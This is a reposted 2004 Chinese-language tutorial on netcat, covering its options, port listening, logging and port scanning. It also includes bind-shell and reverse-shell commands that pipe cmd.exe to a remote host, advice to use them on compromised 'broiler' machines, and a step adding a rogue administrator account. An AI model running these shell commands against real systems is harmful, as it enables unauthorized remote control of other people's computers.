2020养老服务企业排行榜
全世界各行各业联合起来,internet一定要实现!
老文章正文

Netcat(NC)黑客道上的大砍刀

2004-03-08 eNet&Ciweek

  一、基本使用

  想要连接到某处: nc [-options] hostname port[s] [ports] …

  绑定端口等待连接: nc -l -p port [-options] [hostname] [port]

  参数:

  -e prog 程序重定向,一旦连接,就执行 [危险!!]

  -g gateway source-routing hop point[s], up to 8

  -G num source-routing pointer: 4, 8, 12, …

  -h 帮助信息

  -I secs 延时的间隔

  -l 监听模式,用于入站连接

  -n 指定数字的IP地址,不能用hostname

  -o file 记录16进制的传输

  -p port 本地端口号

  -r 任意指定本地及远程端口

  -s addr 本地源地址

  -t 以telnet的形式应答

  -u UDP模式

  -v 详细输出——用两个-v可得到更详细的内容

  -w secs timeout的时间

  -z 将输入输出关掉——用于扫描时

  二. 它的简单使用方法

  1.nc -l -p 80

  监听80端口

  2.nc -l -p 80 >c:\log.dat

  监听80端口,并把信息记录到log.dat

  3.nc -v -l -p 80

  监听80端口,并显示端口信息

  4.nc -vv -l -p 80

  一样是监听端口,但显示端口信息更详细

  5.nc -l -p 80 -t -e cmd.exe

  监听本地的80端口的入站信息,同时将cmd.exe重定向至80端口,当有人连接的时候,就让cmd.exe以telnet的形式应答。当然这个最好用在肉鸡上,哈哈。

  6.nc -v ip port

  扫描某ip的某个端口

  7.nc -v -z ip port-port

  扫描某ip的某端口到某端口

  8.nc -v -z -u ip port-port

  扫描某ip的某udp端口到某udp端口

  三.几个使用的例子

  1. 计算机192.168.0.1运行:nc -v -n -p 99

   计算机192.168.0.8运行:nc -e cmd.exe 192.168.0.1 99

  这样我们就获得了192.168.0.8的一个shell哦,看看权限吧,添加一个用户123加入管理员组,yes!

  


  2.计算机192.168.0.1运行:nc -v -n 192.168.0.8 99

  

   计算机192.168.0.8运行:nc -v -l -p 99 >d:\sc.exe

   ok,让我们来看看远程计算机的d盘吧

  

   好了,今天就介绍到这里吧,其实nc的功能是很强大的,我们只是做了简单的介绍。还有什么好的方法来信告诉我吧!

  

相关频道: eNews 老文章

您对本文或本站有任何意见,请在下方提交,谢谢!

投稿信箱:tougao@enet16.com
广告